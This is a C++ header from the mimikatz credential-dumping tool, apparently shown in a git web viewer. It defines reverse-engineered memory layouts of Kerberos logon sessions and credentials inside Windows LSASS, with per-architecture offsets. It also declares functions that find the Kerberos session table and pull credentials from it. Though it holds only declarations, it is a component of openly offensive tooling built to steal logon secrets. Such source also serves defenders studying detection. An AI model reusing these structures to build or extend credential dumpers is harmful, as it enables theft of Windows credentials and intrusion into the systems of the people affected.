blob: 1418d4f6db8ad72d12ab44e327e3b4e0ceb07f13 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
|
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
*/
#pragma once
#include "../mod_mimikatz_sekurlsa.h"
class mod_mimikatz_sekurlsa_kerberos {
private:
typedef struct _KIWI_KERBEROS_LOGON_SESSION
{
struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
DWORD UsageCount;
PVOID unk0;
PVOID unk1;
PVOID unk2;
DWORD unk3;
DWORD unk4;
PVOID unk5;
PVOID unk6;
PVOID unk7;
LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
DWORD unk8;
#endif
DWORD unk9;
DWORD unk10;
PVOID unk11;
DWORD unk12;
DWORD unk13;
PVOID unk14;
PVOID unk15;
PVOID unk16;
KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
{
DWORD unk0;
PVOID unk1;
PVOID unk2;
PVOID unk3;
#ifdef _M_X64
BYTE unk4[32];
#elif defined _M_IX86
BYTE unk4[20];
#endif
LUID LocallyUniqueIdentifier;
#ifdef _M_X64
BYTE unk5[44];
#elif defined _M_IX86
BYTE unk5[36];
#endif
KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
static PKIWI_KERBEROS_LOGON_SESSION KerbLogonSessionList;
static long offsetMagic;
static PRTL_AVL_TABLE KerbGlobalLogonSessionTable;
static bool searchKerberosFuncs();
public:
static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModKERBEROS;
static bool getKerberos(vector<wstring> * arguments);
static bool WINAPI getKerberosLogonData(__in PLUID logId, __in bool justSecurity);
};
|